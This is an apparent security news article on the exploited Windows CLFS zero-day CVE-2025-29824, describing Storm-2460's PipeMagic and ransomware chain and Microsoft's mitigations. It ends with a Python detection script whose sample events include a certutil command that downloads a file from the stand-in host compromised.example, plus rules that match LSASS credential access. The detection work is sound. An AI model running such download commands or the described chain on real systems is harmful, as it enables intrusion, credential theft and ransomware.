In an alarming revelation, Microsoft’s Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) have identified a significant security vulnerability in the Windows Common Log File System (CLFS). The vulnerability, tracked as CVE-2025-29824, has already been exploited in real-world attacks, notably by the Storm-2460 cybercrime group. This zero-day flaw in the CLFS kernel driver allows attackers to escalate their privileges on compromised systems, potentially paving the way for large-scale ransomware attacks.
Discovered in April 2025, the exploitation of this vulnerability has targeted various sectors, including IT, real estate, finance, and retail, with organizations across the United States, Venezuela, Spain, and Saudi Arabia affected. As of April 8, 2025, Microsoft has released critical security updates to mitigate the risk posed by this zero-day vulnerability, but experts are urging immediate patching to prevent further exploitation.
At its core, CVE-2025-29824 is a privilege escalation flaw. It allows an attacker with standard user privileges to gain administrator-level access on a compromised system, granting them nearly unlimited control over the target device. The exploit works by leveraging the CLFS kernel driver, which handles log file management for Windows systems.
Once successful, the attacker can deploy additional malicious payloads, including ransomware, across the network. Microsoft traced the exploit’s deployment to PipeMagic malware, a tool that the Storm-2460 group is using to infiltrate systems and carry out cyberattacks. Notably, the PipeMagic malware was also previously linked to another zero-day exploit related to a Win32k vulnerability (CVE-2025-24983).
The attack chain begins with Storm-2460 abusing legitimate Windows tools to deliver malicious payloads. Using the built-in certutil utility, the threat actors download a file from a compromised third-party website. This file, disguised as a benign MSBuild file, contains an encrypted malware payload. Once executed, the payload is decrypted and launched via the EnumCalendarInfoA API callback, eventually revealing itself as PipeMagic malware.
The PipeMagic malware then installs the zero-day exploit and enables the attacker to elevate privileges within the compromised environment. A key observation here is the use of the NtQuerySystemInformation API to leak kernel addresses to user mode, which is instrumental in carrying out the exploitation process.
Once the exploit has been successfully deployed, the attacker gains full control over the system. At this stage, they inject a malicious payload into the winlogon.exe process, facilitating the execution of further commands that dump sensitive data, such as user credentials, from the compromised system’s LSASS memory.
This ultimately leads to the deployment of ransomware, with files being encrypted and marked with random extensions. The ransomware also drops a ransom note, named !READ_ME_REXX2!.txt, which provides instructions for the victim on how to pay the ransom. While the exact ransomware variant remains unidentified, two .onion domains found in the ransom notes are linked to the notorious RansomEXX ransomware family.
To address the threat, Microsoft released patches for CVE-2025-29824, which should be applied immediately by all affected organizations. Notably, Windows 11, version 24H2, is not vulnerable to this exploit due to changes in how system information is accessed.
Microsoft is urging customers to implement additional security measures to protect against ransomware attacks. Some of the most critical steps include:
Enabling cloud-delivered protection in Microsoft Defender Antivirus or any other equivalent antivirus product to defend against rapidly evolving threats.
Onboarding unmanaged devices to Microsoft Defender for Endpoint to ensure full visibility into the network and reduce attack surfaces.
Running EDR in block mode to prevent malicious artifacts from infiltrating the system and enabling immediate remediation if any breach occurs.
Using Microsoft 365 Defender to apply advanced attack surface reduction rules and prevent common ransomware techniques.
To further bolster defenses, Microsoft suggests turning on advanced protection capabilities such as Microsoft Defender XDR, which integrates endpoint detection and response with other security tools for a more comprehensive approach. Security Copilot, available through Microsoft Defender, offers an added layer of protection by automating investigations and incident response tasks.
Additionally, customers can use Microsoft Sentinel to track malicious activity and apply threat intelligence for faster detection and response. For more granular control, Sentinel’s TI Mapping analytics can correlate malicious domains, such as those associated with PipeMagic and RansomEXX, with data in their workspace.
As this exploit continues to unfold, organizations must prioritize patching and deploying the necessary defenses to avoid falling victim to ransomware attacks. With cybercriminals becoming more sophisticated in their methods, it is essential for businesses to stay ahead of the curve by following Microsoft’s guidance and applying the latest security updates.
For those seeking more detailed information on the attack, indicators of compromise, and detection methods, Microsoft has provided a comprehensive set of resources. These include hunting queries for Microsoft Sentinel and indicators like the CLFS BLF file path and suspicious command lines related to ransomware activity.
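As an added illustration of the detection angle the article points to (certutil used as a downloader, a CLFS .blf file in an unexpected location, the winlogon.exe to LSASS step, and the ransom note name), here is a small Python rule set run over constructed, Sysmon-style sample events. It is not Microsoft's hunting query or any code from the advisory; the event shape, the sample paths and hostnames, and the user-writable-path heuristic for .blf files are assumptions made for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry in a simplified Sysmon-like shape; paths and hostnames are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil -urlcache -split -f http://compromised.example/update.tmp C:\\Users\\Public\\update.tmp"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil -hashfile C:\\Windows\\System32\\ntoskrnl.exe SHA256"},
    {"event": "FileCreate", "image": r"C:\Users\Public\loader.exe",
     "target_filename": r"C:\ProgramData\PLACEHOLDER\PLACEHOLDER.blf"},
    {"event": "FileCreate", "image": r"C:\Windows\System32\svchost.exe",
     "target_filename": r"C:\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventLog-Application.etl"},
    {"event": "ProcessAccess", "source_image": r"C:\Windows\System32\winlogon.exe",
     "target_image": r"C:\Windows\System32\lsass.exe"},
    {"event": "FileCreate", "image": r"C:\Users\Public\enc.exe",
     "target_filename": r"C:\Users\alice\Documents\!READ_ME_REXX2!.txt"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RANSOM_NOTE = "\\!read_me_rexx2!.txt"  # note file name reported in the article
# Heuristic (assumption): CLFS .blf files appearing under user-writable roots deserve review.
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, evidence) pairs for events matching the chain described above."""
    findings: List[Tuple[str, str]] = []
    for e in events:
        kind = e.get("event")
        if kind == "ProcessCreate":
            cmd = e.get("command_line", "")
            # certutil acting as a downloader: a URL on its command line
            if e["image"].lower().endswith("\\certutil.exe") and URL_RE.search(cmd):
                findings.append(("certutil-download", cmd))
        elif kind == "FileCreate":
            name = e["target_filename"].lower()
            if name.endswith(RANSOM_NOTE):
                findings.append(("ransom-note-dropped", e["target_filename"]))
            elif name.endswith(".blf") and name.startswith(USER_WRITABLE):
                findings.append(("blf-in-user-writable-path", e["target_filename"]))
        elif kind == "ProcessAccess":
            # winlogon.exe opening lsass.exe matches the injected-payload credential dump step
            if (e["source_image"].lower().endswith("\\winlogon.exe")
                    and e["target_image"].lower().endswith("\\lsass.exe")):
                findings.append(("winlogon-accesses-lsass", e["source_image"]))
    return findings

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

The .blf location rule in particular needs tuning against a baseline of which applications legitimately create CLFS logs in those directories before it is used for alerting.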